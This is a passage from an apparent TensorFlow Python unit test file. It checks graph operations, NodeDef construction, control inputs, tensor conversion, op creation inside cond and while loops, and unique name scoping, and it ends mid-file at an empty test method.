self.assertAllEqual(x.dense_shape, st_reconstructed.dense_shape)
@test_util.run_v1_only("IndexedSlicesValue is deprecated in v2")
def testFromNumpyComponents(self):
indices = np.array([3, 8])
values = np.array([1.0, 9.0])
dense_shape = np.array([100])
spec1 = indexed_slices.IndexedSlicesSpec(dense_shape_dtype=dtypes.int32)
st1 = spec1._from_components((values, indices, dense_shape))
self.assertIsInstance(st1, indexed_slices.IndexedSlicesValue)
self.assertAllEqual(st1.indices, indices)
self.assertAllEqual(st1.values, values)
self.assertAllEqual(st1.dense_shape, dense_shape)
spec2 = indexed_slices.IndexedSlicesSpec()
st2 = spec2._from_components((values, indices))
self.assertIsInstance(st2, indexed_slices.IndexedSlicesValue)
self.assertAllEqual(st2.indices, indices)
self.assertAllEqual(st2.values, values)
self.assertIsNone(st2.dense_shape)
class NodeDefConstructorTest(test_util.TensorFlowTestCase):
def testNoArgs(self):
nodedef = ops._NodeDef("None", "bar")
self.assertProtoEquals("op: 'None' name: 'bar'", nodedef)
def _apply_op(g, *args, **kwargs):
op = g.create_op(*args, **kwargs)
if len(op.outputs) == 1:
return op.outputs[0]
else:
return op.outputs
class OperationTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testNoInputs(self):
op = test_ops.float_output_string_output(name="myop").a.op
self.assertEqual(2, len(op.values()))
self.assertEqual(0, len(op.inputs))
self.assertEqual("myop", op.name)
float_t, label_str_t = op.values()
self.assertEqual(dtypes.float32, float_t.dtype)
self.assertEqual(op, float_t.op)
self.assertEqual(0, float_t._value_index)
self.assertEqual(0, len(float_t.consumers()))
self.assertEqual("myop", float_t._as_node_def_input())
self.assertEqual(dtypes.string, label_str_t.dtype)
self.assertEqual(op, label_str_t.op)
self.assertEqual(1, label_str_t._value_index)
self.assertEqual(0, len(label_str_t.consumers()))
self.assertEqual("myop:1", label_str_t._as_node_def_input())
self.assertProtoEquals("op:'FloatOutputStringOutput' name:'myop'",
op.node_def)
@test_util.run_deprecated_v1
def testNoOutputs(self):
op1 = test_ops.float_output(name="myop1").op
float_t, = op1.values()
op2 = test_ops.float_input(float_t, name="myop2")
self.assertEqual(0, len(op2.values()))
self.assertEqual(1, len(op2.inputs))
self.assertIs(float_t, op2.inputs[0])
self.assertEqual(1, len(float_t.consumers()))
self.assertEqual(op2, float_t.consumers()[0])
self.assertProtoEquals("op:'FloatOutput' name:'myop1'", op1.node_def)
self.assertProtoEquals("op:'FloatInput' name:'myop2' input:'myop1'",
op2.node_def)
@test_util.run_deprecated_v1
def testInputsAndOutputs(self):
op1 = test_ops.float_output(name="myop1").op
self.assertEqual(1, len(op1.values()))
float1_t, = op1.values()
op2 = test_ops.float_output_string_output(name="myop2").a.op
self.assertEqual(2, len(op2.values()))
float2_t, label2_str_t = op2.values()
# Note that we consume label2_str_t twice here.
op3 = test_ops.foo2(float1_t, label2_str_t, label2_str_t, name="myop3").d.op
self.assertEqual(2, len(op3.values()))
self.assertEqual(1, len(float1_t.consumers()))
self.assertEqual(op3, float1_t.consumers()[0])
self.assertEqual(0, len(float2_t.consumers()))
self.assertEqual(2, len(label2_str_t.consumers()))
self.assertEqual(op3, label2_str_t.consumers()[0])
self.assertEqual(op3, label2_str_t.consumers()[1])
self.assertProtoEquals("""
op:'Foo2' name:'myop3'
input:'myop1' input:'myop2:1' input:'myop2:1'
""", op3.node_def)
def testDeviceObject(self):
op = ops.Operation(ops._NodeDef("None", "myop"), ops.Graph(), [], [])
op._set_device("/job:goo/device:GPU:0")
self.assertProtoEquals(
"op:'None' name:'myop' device:'/job:goo/device:GPU:0' ", op.node_def)
op = ops.Operation(ops._NodeDef("None", "op2"), ops.Graph(), [], [])
op._set_device(
pydev.DeviceSpec(
job="muu", device_type="CPU", device_index=0))
self.assertProtoEquals(
"op:'None' name:'op2' device:'/job:muu/device:CPU:0'", op.node_def)
def testReferenceInput(self):
g = ops.Graph()
op1 = ops.Operation(
ops._NodeDef("RefOutputFloatOutput", "op1"), g, [],
[dtypes.float32_ref, dtypes.float32])
self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'", op1.node_def)
self.assertEqual([], list(op1.inputs))
ref_t, nonref_t = op1.values()
# NOTE(mrry): Must specify input_types to preserve ref-typed input.
op2 = ops.Operation(
ops._NodeDef("RefInputFloatInput", "op2"),
g, [ref_t, nonref_t], [],
input_types=[dtypes.float32_ref, dtypes.float32])
self.assertProtoEquals(
"op:'RefInputFloatInput' name:'op2' input:'op1' input:'op1:1'",
op2.node_def)
self.assertEqual([ref_t, nonref_t], list(op2.inputs))
op3 = ops.Operation(
ops._NodeDef("TwoFloatInputs", "op3"), g, [ref_t, nonref_t], [])
self.assertProtoEquals(
"op:'TwoFloatInputs' name:'op3' input:'op1' input:'op1:1'",
op3.node_def)
def testInvalidNames(self):
g = ops.Graph()
with self.assertRaises(ValueError):
ops.Operation(ops._NodeDef("op", ""), g)
with self.assertRaises(ValueError):
ops.Operation(ops._NodeDef("op", "_invalid"), g)
with self.assertRaises(ValueError):
ops.Operation(ops._NodeDef("op", "-invalid"), g)
with self.assertRaises(ValueError):
ops.Operation(ops._NodeDef("op", "/invalid"), g)
with self.assertRaises(ValueError):
ops.Operation(ops._NodeDef("op", "invalid:0"), g)
@test_util.run_deprecated_v1
def testNoShapeFunction(self):
op = test_ops.a()
self.assertEqual(tensor_shape.unknown_shape(), op.get_shape())
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorNestedArray(self):
values = [[2], [3], [5], [7]]
tensor = ops.convert_to_tensor(values)
self.assertAllEqual((4, 1), tensor.get_shape().as_list())
self.assertAllEqual(values, self.evaluate(tensor))
def testShapeTuple(self):
with self.cached_session():
c = constant_op.constant(1)
self.assertEqual(c._shape_tuple(), ()) # pylint: disable=protected-access
def testConvertToTensorEager(self):
with context.eager_mode():
t = constant_op.constant(1)
self.assertTrue(isinstance(t, ops.EagerTensor))
converted = ops.convert_to_tensor(t)
self.assertTrue(isinstance(converted, ops.EagerTensor))
converted = ops.convert_to_tensor(1)
self.assertTrue(isinstance(converted, ops.EagerTensor))
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorNestedTuple(self):
values = ((2,), (3,), (5,), (7,))
tensor = ops.convert_to_tensor(values)
self.assertAllEqual((4, 1), tensor.get_shape().as_list())
self.assertAllEqual(values, self.evaluate(ops.convert_to_tensor(values)))
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorNestedTensors(self):
values = ((2,), (3,), (5,), (7,))
tensor = ops.convert_to_tensor(
[constant_op.constant(row) for row in values])
self.assertAllEqual((4, 1), tensor.get_shape().as_list())
self.assertAllEqual(values, self.evaluate(tensor))
tensor = ops.convert_to_tensor(
[[constant_op.constant(v) for v in row] for row in values])
self.assertAllEqual((4, 1), tensor.get_shape().as_list())
self.assertAllEqual(values, self.evaluate(tensor))
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorNestedMix(self):
values = ([2], (3,), [constant_op.constant(5)], constant_op.constant([7]))
tensor = ops.convert_to_tensor(values)
self.assertAllEqual((4, 1), tensor.get_shape().as_list())
self.assertAllEqual(((2,), (3,), (5,), (7,)), self.evaluate(tensor))
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorPreferred(self):
values = [2, 3, 5, 7]
tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.float32)
self.assertEqual(dtypes.float32, tensor.dtype)
# Convert empty tensor to anything.
values = []
tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.int64)
self.assertEqual(dtypes.int64, tensor.dtype)
# The preferred dtype is a type error and will convert to
# float32 instead.
values = [1.23]
tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.int64)
self.assertEqual(dtypes.float32, tensor.dtype)
@test_util.run_in_graph_and_eager_modes
def testConvertToInvalidTensorType(self):
with self.assertRaises(TypeError):
# Forcing an invalid dtype should fail with a type error.
values = [1.23]
ops.convert_to_tensor(values, dtype=dtypes.int64)
@test_util.run_in_graph_and_eager_modes
def testConvertToLongLongTensorType(self):
tensor = ops.convert_to_tensor(
# Get a numpy array of dtype NPY_LONGLONG
np.prod(constant_op.constant([1])._shape_tuple()),
dtype=dtypes.int64)
self.assertEqual(dtypes.int64, tensor.dtype)
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorFromInvalidTensor(self):
tensor = constant_op.constant(42.0, dtype=dtypes.float32)
with self.assertRaises(ValueError):
ops.convert_to_tensor(tensor, dtype=dtypes.int32)
@test_util.run_in_graph_and_eager_modes
def testConvertToTensorProtocol(self):
class TensorCompatible:
def __tf_tensor__(self, dtype=None, name=None):
return constant_op.constant((1, 2, 3), dtype=dtype, name=name)
tc = TensorCompatible()
tensor = ops.convert_to_tensor(tc, dtype=dtypes.int32)
self.assertEqual(tensor.dtype, dtypes.int32)
self.assertAllEqual((1, 2, 3), self.evaluate(tensor))
@test_util.run_deprecated_v1
def testNoConvert(self):
# Operation cannot be converted to Tensor.
op = control_flow_ops.no_op()
with self.assertRaisesRegex(TypeError,
"can't convert Operation '.+' to Tensor"):
ops.convert_to_tensor(op)
def testStr(self):
node_def = ops._NodeDef("None", "op1")
op = ops.Operation(node_def, ops.Graph(), [], [dtypes.float32])
self.assertEqual(str(node_def), str(op))
def testRepr(self):
op = ops.Operation(
ops._NodeDef("None", "op1"), ops.Graph(), [], [dtypes.float32])
self.assertEqual("<tf.Operation 'op1' type=None>", repr(op))
@test_util.run_deprecated_v1
def testGetAttr(self):
op = test_ops.default_attrs()
self.assertEqual(op.get_attr("string_val"), b"abc")
self.assertEqual(op.get_attr("string_list_val"), [b"abc", b""])
self.assertEqual(op.get_attr("int_val"), 123)
self.assertEqual(op.get_attr("int_list_val"), [1, 2, 3])
self.assertEqual(op.get_attr("float_val"), 10.0)
self.assertEqual(op.get_attr("float_list_val"), [10.0])
self.assertEqual(op.get_attr("bool_val"), True)
self.assertEqual(op.get_attr("bool_list_val"), [True, False])
self.assertEqual(op.get_attr("shape_val"),
tensor_shape.as_shape([2, 1]).as_proto())
self.assertEqual(op.get_attr("shape_list_val"),
[tensor_shape.as_shape([]).as_proto(),
tensor_shape.as_shape([1]).as_proto()])
self.assertEqual(op.get_attr("tensor_val"),
tensor_util.make_tensor_proto(1, dtypes.int32))
self.assertEqual(op.get_attr("tensor_list_val"),
[tensor_util.make_tensor_proto(1, dtypes.int32)])
type_val = op.get_attr("type_val")
# First check that type_val is a DType, because the assertEqual will work
# no matter what since DType overrides __eq__
self.assertIsInstance(type_val, dtypes.DType)
self.assertEqual(type_val, dtypes.int32)
type_list_val = op.get_attr("type_list_val")
self.assertTrue(all(isinstance(x, dtypes.DType) for x in type_list_val))
self.assertEqual(type_list_val, [dtypes.int32, dtypes.float32])
@function.Defun(dtypes.float32, func_name="MyFunc")
def func(x):
return x
op = test_ops.func_attr(func)
self.assertEqual(op.get_attr("f"),
attr_value_pb2.NameAttrList(name="MyFunc"))
# Try fetching missing attr
with self.assertRaisesRegex(
ValueError, "Operation 'FuncAttr' has no attr named 'FakeAttr'."):
op.get_attr("FakeAttr")
# TODO(b/65162920): remove this test when users who are directly mutating the
# node_def have been updated to proper usage.
@test_util.run_deprecated_v1
def testSetAttr(self):
op = test_ops.int_attr().op
op._set_attr("foo", attr_value_pb2.AttrValue(i=2))
# TODO(skyewm): add node_def check
self.assertEqual(op.get_attr("foo"), 2)
# TODO(nolivia): test all error cases
def testAddControlInput(self):
with ops.Graph().as_default():
x = constant_op.constant(1).op
y = constant_op.constant(2).op
z = constant_op.constant(3).op
z._add_control_input(x) # pylint: disable=protected-access
self.assertEqual(z.control_inputs, [x])
z._add_control_input(x) # pylint: disable=protected-access
self.assertEqual(z.control_inputs, [x])
z._add_control_inputs([x, y, y]) # pylint: disable=protected-access
self.assertEqual(z.control_inputs, [x, y])
self.assertEqual(x._control_outputs, [z])
@test_util.run_deprecated_v1
def testRemoveAllControlInputs(self):
a = constant_op.constant(1)
with ops.control_dependencies([a]):
b = constant_op.constant(2)
c = constant_op.constant(3)
d = constant_op.constant(4)
e = constant_op.constant(5)
with ops.control_dependencies([a, c]):
f = d + e
self.assertEqual(a.op.control_inputs, [])
self.assertEqual(b.op.control_inputs, [a.op])
self.assertEqual(f.op.control_inputs, [a.op, c.op])
a.op._remove_all_control_inputs() # pylint: disable=protected-access
self.assertEqual(a.op.control_inputs, [])
b.op._remove_all_control_inputs() # pylint: disable=protected-access
self.assertEqual(b.op.control_inputs, [])
f.op._remove_all_control_inputs() # pylint: disable=protected-access
self.assertEqual(f.op.control_inputs, [])
self.assertEqual(list(f.op.inputs), [d, e])
@test_util.run_deprecated_v1
def testControlInputCycle(self):
graph = ops.Graph()
with graph.as_default():
z = constant_op.constant(0)
x = constant_op.constant(1)
y = constant_op.constant(2)
y.op._add_control_input(z.op) # pylint: disable=protected-access
y.op._add_control_input(x.op) # pylint: disable=protected-access
x.op._add_control_input(y.op) # pylint: disable=protected-access
with self.session(graph=graph) as sess:
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Graph is invalid, contains a cycle with 2 nodes"):
self.evaluate(x)
def testUpdateInput(self):
g = ops.Graph()
with g.as_default():
x = constant_op.constant(1)
y = constant_op.constant(2)
z = x + y
z.op._update_input(0, y) # pylint: disable=protected-access
self.assertEqual(list(z.op.inputs), [y, y])
self.assertEqual(x.consumers(), [])
self.assertEqual(y.consumers(), [z.op, z.op])
with session.Session(graph=g) as sess:
self.assertEqual(self.evaluate(z), 4)
z.op._update_input(0, x) # pylint: disable=protected-access
self.assertEqual(list(z.op.inputs), [x, y])
self.assertEqual(x.consumers(), [z.op])
self.assertEqual(y.consumers(), [z.op])
with session.Session(graph=g) as sess:
self.assertEqual(self.evaluate(z), 3)
z.op._update_input(1, y) # pylint: disable=protected-access
self.assertEqual(list(z.op.inputs), [x, y])
self.assertEqual(x.consumers(), [z.op])
self.assertEqual(y.consumers(), [z.op])
with session.Session(graph=g) as sess:
self.assertEqual(self.evaluate(z), 3)
def testUpdateInputGraphError(self):
g_0 = ops.Graph()
g_1 = ops.Graph()
with g_0.as_default():
x = constant_op.constant(1)
with g_1.as_default():
y = constant_op.constant(2)
z = y * 2
with self.assertRaisesRegex(ValueError, "must be from the same graph"):
z.op._update_input(0, x) # pylint: disable=protected-access
def testUpdateInputTypeError(self):
g = ops.Graph()
with g.as_default():
w = constant_op.constant(0)
x = constant_op.constant("")
y = constant_op.constant(1)
z = y + w
z.op._update_input(0, x) # pylint: disable=protected-access
with session.Session(graph=g) as sess:
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Input 0 of node add was passed string from Const_1:0 incompatible "
"with expected int32"):
self.evaluate(z)
def testUpdateInputShapeError(self):
g = ops.Graph()
with g.as_default():
w = constant_op.constant(2, shape=[3, 1])
x = constant_op.constant(0, shape=[3, 1])
y = constant_op.constant(1, shape=[2, 2])
z = w + x
with self.assertRaisesRegex(
errors.InvalidArgumentError,
r"Cannot update edge, incompatible shapes: \[2,2\] and \[3,1\]"):
z.op._update_input(0, y) # pylint: disable=protected-access
def testUpdateInputOutOfRange(self):
g = ops.Graph()
with g.as_default():
x = constant_op.constant(1)
with self.assertRaisesRegex(
errors.OutOfRangeError,
r"Cannot update edge. Input index \[1\] is greater than the number of "
r"total inputs \[0\]."):
x.op._update_input(1, x) # pylint: disable=protected-access
@test_util.enable_control_flow_v2
@test_util.run_v1_only("b/120545219")
def testAddWhileInput(self):
@eager_function.defun
def test():
output = control_flow_ops.while_loop(lambda x: x < 3, lambda x: x + 1,
[1])
while_op = output.op
self.assertEqual(while_op.type, "StatelessWhile")
orig_num_inputs = len(while_op.inputs)
# Make sure we can handle the while op having a control input.
while_op._add_control_input(constant_op.constant(0).op)
new_input1 = constant_op.constant(1.0)
new_input2 = constant_op.constant(True)
# Clear output shapes to bypass shape checking.
while_op._set_shape_list_attr("output_shapes", [])
while_op._set_type_list_attr("T", [t.dtype for t in while_op.inputs] +
[new_input1.dtype, new_input2.dtype])
while_op._add_while_inputs([new_input1, new_input2])
# Can't add an edge beyond what's specified by "T"
with self.assertRaises(errors.OutOfRangeError):
while_op._add_while_inputs([new_input2])
self.assertLen(while_op.inputs, orig_num_inputs + 2) # pylint: disable=g-deprecated-assert
test()
@test_util.run_deprecated_v1
def testOpDef(self):
x = constant_op.constant(0)
y = constant_op.constant(1)
z = x + y
self.assertEqual(x.op.op_def.name, "Const")
self.assertLen(x.op.op_def.input_arg, 0)
self.assertLen(x.op.op_def.output_arg, 1)
self.assertRegex(z.op.op_def.name, "Add(V2)?")
self.assertLen(z.op.op_def.input_arg, 2)
self.assertLen(z.op.op_def.output_arg, 1)
def testInputFromDifferentGraphError(self):
g_0 = ops.Graph()
g_1 = ops.Graph()
with g_0.as_default():
x = constant_op.constant(1)
with g_1.as_default():
y = constant_op.constant(2)
with self.assertRaisesRegex(ValueError, "must be from the same graph"):
y * x # pylint: disable=pointless-statement
def testInputsAreImmutable(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
op = test_ops.int_input_int_output(x, name="myop").op
with self.assertRaisesRegex(AttributeError,
"'tuple' object has no attribute 'append'"):
op.inputs.append(None)
class CreateOpTest(test_util.TensorFlowTestCase):
def testNodeDefArgs(self):
g = ops.Graph()
op1 = g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
with g.device("/device:GPU:0"):
op2 = g.create_op(
"FloatOutputStringOutput", [], [dtypes.float32, dtypes.string], None,
name="myop2")
op3 = g.create_op(
"Foo3",
[list(op1.values())[0], list(op2.values())[1], list(op2.values())[0]],
[dtypes.float32, dtypes.int32],
None,
name="myop3")
self.assertDeviceEqual(None, op1.device)
self.assertDeviceEqual("/device:GPU:0", op2.device)
self.assertDeviceEqual(None, op3.device)
self.assertProtoEquals("name:'myop1' op:'FloatOutput'", op1.node_def)
self.assertProtoEquals(
"name:'myop2' op:'FloatOutputStringOutput' device:'/device:GPU:0'",
op2.node_def)
self.assertProtoEquals(
"name:'myop3' input:'myop1' input:'myop2:1' input:'myop2' op:'Foo3'",
op3.node_def)
def testReferenceInput(self):
g = ops.Graph()
op1 = g.create_op(
"RefOutputFloatOutput", [], [dtypes.float32_ref, dtypes.float32],
name="op1")
self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'", op1.node_def)
ref_t, nonref_t = op1.values()
# NOTE(mrry): Must specify input_types to preserve ref-typed input.
op2 = g.create_op(
"RefInputFloatInput", [ref_t, nonref_t], [],
input_types=[dtypes.float32_ref, dtypes.float32],
name="op2")
self.assertProtoEquals(
"op:'RefInputFloatInput' name:'op2' input:'op1' input:'op1:1'",
op2.node_def)
op3 = g.create_op("TwoFloatInputs", [ref_t, nonref_t], [], name="op3")
self.assertProtoEquals(
"op:'TwoFloatInputs' name:'op3' input:'op1' input:'op1:1'",
op3.node_def)
def testFinalized(self):
g = ops.Graph()
g.finalize()
with self.assertRaises(RuntimeError):
g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
# Test unfinalize.
g._unsafe_unfinalize()
g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
# NOTE(skyewm): these cases test the private Graph._create_op_from_tf_operation
# method. Arguably we should only test the public APIs that depend on this
# method. However, this logic is complex and tricky, and it can be difficult to
# ascertain if we have adequate coverage (e.g. a graph may run successfully if
# the control flow context isn't set properly, but a more complicated use case
# that might not be obvious to test will fail). Thus we instead explicitly test
# the low-level behavior.
class CreateOpFromTFOperationTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testBasic(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
c_op = ops._create_c_op(
g, ops._NodeDef("IntInputIntOutput", "myop"), [x], [])
op = g._create_op_from_tf_operation(c_op)
self.assertEqual(op.name, "myop")
self.assertEqual(op.type, "IntInputIntOutput")
self.assertLen(op.outputs, 1)
self.assertEqual(op.outputs[0].shape, tensor_shape.unknown_shape())
self.assertEqual(list(op.inputs), [x])
self.assertEqual(op.control_inputs, [])
self.assertEqual(op.graph, g)
self.assertEqual(x.consumers(), [op])
self.assertIsNotNone(op.traceback)
self.assertEqual(g.get_operation_by_name("myop"), op)
self.assertEqual(g.get_tensor_by_name("myop:0"), op.outputs[0])
def testShape(self):
g = ops.Graph()
with g.as_default():
x = constant_op.constant([[1, 2, 3], [4, 5, 6]])
c_op = ops._create_c_op(g, ops._NodeDef("Identity", "myop"), [x], [])
op = g._create_op_from_tf_operation(c_op)
self.assertEqual(op.name, "myop")
self.assertEqual(op.type, "Identity")
self.assertLen(op.outputs, 1)
self.assertEqual(op.outputs[0].shape, tensor_shape.TensorShape([2, 3]))
def testUniqueName(self):
g = ops.Graph()
with g.as_default():
c_op = ops._create_c_op(g, ops._NodeDef("IntOutput", "myop"), [], [])
c_op2 = ops._create_c_op(g, ops._NodeDef("IntOutput", "myop_1"), [], [])
op = g._create_op_from_tf_operation(c_op)
op2 = g._create_op_from_tf_operation(c_op2)
# Create ops with same names as op1 and op2. We expect the new names to be
# uniquified.
op3 = test_ops.int_output(name="myop").op
op4 = test_ops.int_output(name="myop_1").op
self.assertEqual(op.name, "myop")
self.assertEqual(op2.name, "myop_1")
self.assertEqual(op3.name, "myop_2")
self.assertEqual(op4.name, "myop_1_1")
@test_util.run_v1_only("b/120545219")
def testCond(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
def true_fn():
ops._create_c_op(ops.get_default_graph(),
ops._NodeDef("IntInput", "cond/myop"), [x], [])
new_ops = g._add_new_tf_operations()
self.assertLen(new_ops, 1)
return x
control_flow_ops.cond(x < 10, true_fn, lambda: x)
op = g.get_operation_by_name("cond/myop")
self.assertIsNotNone(op)
self.assertEqual(op.name, "cond/myop")
self.assertEqual(op.type, "IntInput")
self.assertEqual(op.outputs, [])
op_input = op.inputs[0].op
self.assertEqual(op_input.type, "Switch")
self.assertEqual(op_input.inputs[0], x)
self.assertEqual(op.graph, g)
# pylint: disable=protected-access
self.assertIsNotNone(op._get_control_flow_context())
self.assertEqual(op._get_control_flow_context().name,
"cond/cond_text")
# pylint: enable=protected-access
@test_util.run_v1_only("b/120545219")
def testWhileLoop(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
def body(i):
ops._create_c_op(ops.get_default_graph(),
ops._NodeDef("IntInput", "myloop/myop"), [x], [])
new_ops = g._add_new_tf_operations()
self.assertLen(new_ops, 1)
return i
control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
op = g.get_operation_by_name("myloop/myop")
self.assertIsNotNone(op)
self.assertEqual(op.name, "myloop/myop")
self.assertEqual(op.type, "IntInput")
self.assertEqual(op.outputs, [])
op_input = op.inputs[0].op
self.assertEqual(op_input.type, "Enter")
self.assertEqual(list(op_input.inputs), [x])
self.assertEqual(op.graph, g)
# pylint: disable=protected-access
self.assertIsNotNone(op._get_control_flow_context())
self.assertEqual(op._get_control_flow_context().name,
"myloop/while_context")
# pylint: enable=protected-access
@test_util.run_v1_only("b/120545219")
def testWhileLoopWithInternalControlDep(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
def body(i):
c = constant_op.constant(1.0, name="c")
ops._create_c_op(ops.get_default_graph(),
ops._NodeDef("IntInput", "myloop/myop"), [x], [])
with ops.control_dependencies([c]):
new_ops = g._add_new_tf_operations()
self.assertLen(new_ops, 1)
return i
control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
op = g.get_operation_by_name("myloop/myop")
self.assertIsNotNone(op)
c = g.get_operation_by_name("myloop/c")
self.assertIsNotNone(c)
# Internal control dep is preserved
self.assertEqual(op.control_inputs, [c])
@test_util.run_v1_only("b/120545219")
def testWhileLoopWithExternalControlDep(self):
g = ops.Graph()
with g.as_default():
x = test_ops.int_output()
c = constant_op.constant(1.0)
def body(i):
ops._create_c_op(ops.get_default_graph(),
ops._NodeDef("IntInput", "myloop/myop"), [x], [])
with ops.control_dependencies([c]):
new_ops = g._add_new_tf_operations()
self.assertLen(new_ops, 1)
return i
control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
op = g.get_operation_by_name("myloop/myop")
self.assertIsNotNone(op)
# External control dep is removed and replaced with internal control dep
self.assertNotEqual(op.control_inputs[0], c.op)
self.assertIsNotNone(op.control_inputs[0]._get_control_flow_context())
class ApplyOpTest(test_util.TensorFlowTestCase):
def testNodeDefArgs(self):
g = ops.Graph()
t1 = _apply_op(g, "FloatOutput", [], [dtypes.float32], name="myop1")
with g.device("/device:GPU:0"):
t2 = _apply_op(
g, "TwoIntOutputs", [], [dtypes.int32, dtypes.int32], name="myop2")
t3 = _apply_op(
g,
"Foo1", [t1, t2[1], t2[0]], [dtypes.float32, dtypes.int32],
name="myop3")
self.assertTrue(isinstance(t1, ops.Tensor))
self.assertTrue(isinstance(t2, list))
self.assertTrue(isinstance(t3, list))
self.assertTrue(isinstance(t3[0], ops.Tensor))
self.assertEqual("myop1", t1._as_node_def_input())
self.assertEqual("myop2", t2[0]._as_node_def_input())
self.assertEqual("myop2:1", t2[1]._as_node_def_input())
self.assertEqual("myop3", t3[0]._as_node_def_input())
# Validate that we got the right ops as well
self.assertProtoEquals("name:'myop1' op:'FloatOutput'", t1.op.node_def)
self.assertProtoEquals(
"name:'myop2' op:'TwoIntOutputs' device:'/device:GPU:0'",
t2[0].op.node_def)
self.assertProtoEquals(
"name:'myop3' input:'myop1' input:'myop2:1' input:'myop2' op:'Foo1'",
t3[0].op.node_def)
def testReferenceInput(self):
g = ops.Graph()
ref_t, nonref_t = _apply_op(
g, "RefOutputFloatOutput", [], [dtypes.float32_ref, dtypes.float32],
name="op1")
self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'",
ref_t.op.node_def)
# NOTE(mrry): Must specify input_types to preserve ref-typed input.
out_2 = _apply_op(
g,
"RefInputFloatInputIntOutput", [ref_t, nonref_t], [dtypes.int32],
input_types=[dtypes.float32_ref, dtypes.float32],
name="op2")
self.assertProtoEquals(
"op:'RefInputFloatInputIntOutput' name:'op2' input:'op1' input:'op1:1'",
out_2.op.node_def)
out_3 = _apply_op(
g, "TwoFloatInputsIntOutput", [ref_t, nonref_t], [dtypes.int32],
name="op3")
self.assertProtoEquals(
"op:'TwoFloatInputsIntOutput' name:'op3' input:'op1' input:'op1:1'",
out_3.op.node_def)
class NameStackTest(test_util.TensorFlowTestCase):
def testBasics(self):
g = ops.Graph()
self.assertEqual("foo", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo", g.unique_name("foo"))
self.assertEqual("foo_1", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo_1", g.unique_name("foo"))
self.assertEqual("foo_2", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo_2", g.unique_name("foo"))
self.assertEqual("foo_1_1", g.unique_name("foo_1", mark_as_used=False))
self.assertEqual("foo_1_1", g.unique_name("foo_1"))
self.assertEqual("foo_1_2", g.unique_name("foo_1", mark_as_used=False))
self.assertEqual("foo_1_2", g.unique_name("foo_1"))
self.assertEqual("foo_1_2_1", g.unique_name("foo_1_2", mark_as_used=False))
self.assertEqual("foo_1_2_1", g.unique_name("foo_1_2"))
with g.name_scope("bar"):
self.assertEqual("bar/foo", g.unique_name("foo", mark_as_used=False))
self.assertEqual("bar/foo", g.unique_name("foo"))
self.assertEqual("bar/foo_1", g.unique_name("foo", mark_as_used=False))
self.assertEqual("bar/foo_1", g.unique_name("foo"))
with g.name_scope(None):
self.assertEqual("foo_3", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo_3", g.unique_name("foo"))
with g.name_scope("baz"):
self.assertEqual(
"bar/baz/foo", g.unique_name(
"foo", mark_as_used=False))
self.assertEqual("bar/baz/foo", g.unique_name("foo"))
self.assertEqual(
"bar/baz/foo_1", g.unique_name(
"foo", mark_as_used=False))
self.assertEqual("bar/baz/foo_1", g.unique_name("foo"))
with g.name_scope("baz"):
self.assertEqual(
"bar/baz_1/foo", g.unique_name(
"foo", mark_as_used=False))
self.assertEqual("bar/baz_1/foo", g.unique_name("foo"))
self.assertEqual(
"bar/baz_1/foo_1", g.unique_name(
"foo", mark_as_used=False))
self.assertEqual("bar/baz_1/foo_1", g.unique_name("foo"))
with g.name_scope("quux"):
self.assertEqual("quux/foo", g.unique_name("foo", mark_as_used=False))
self.assertEqual("quux/foo", g.unique_name("foo"))
with g.name_scope("bar"):
with g.name_scope("baz"):
self.assertEqual(
"bar_1/baz/foo", g.unique_name(
"foo", mark_as_used=False))
self.assertEqual("bar_1/baz/foo", g.unique_name("foo"))
self.assertEqual("foo_4", g.unique_name("foo", mark_as_used=False))
self.assertEqual("foo_4", g.unique_name("foo"))
self.assertEqual("bar_2", g.unique_name("bar", mark_as_used=False))
self.assertEqual("bar_2", g.unique_name("bar"))
def testBackslashAndDashRegex(self):
# GitHub issue 39019, all should pass
g = ops.Graph()
with g.name_scope("n_CatCntc-campaign\\c_campaign"):
pass
with g.name_scope("foo"):
with g.name_scope("n_CatCntc-campaign\\c_campaign"):
pass
with g.name_scope("n_CatCntc-campaign\\c_campaign"):
with g.name_scope("foo"):
pass
@test_util.run_deprecated_v1
def testNameAndVariableScope(self):
with self.cached_session() as sess:
with sess.graph.name_scope("l0"):
with variable_scope.variable_scope("l1"):
with sess.graph.name_scope("l1") as scope:
self.assertEqual("l0/l1/l1/", scope)
self.assertEqual(
"l0/l1/l1/foo",
sess.graph.unique_name(
"foo", mark_as_used=False))
self.assertEqual("l0/l1/l1/foo", sess.graph.unique_name("foo"))
with sess.graph.name_scope("l2") as scope:
self.assertEqual("l0/l1/l2/", scope)
self.assertEqual(
"l0/l1/l2/foo",
sess.graph.unique_name(
"foo", mark_as_used=False))
self.assertEqual("l0/l1/l2/foo", sess.graph.unique_name("foo"))
def testOutOfOrderUniqueName(self):
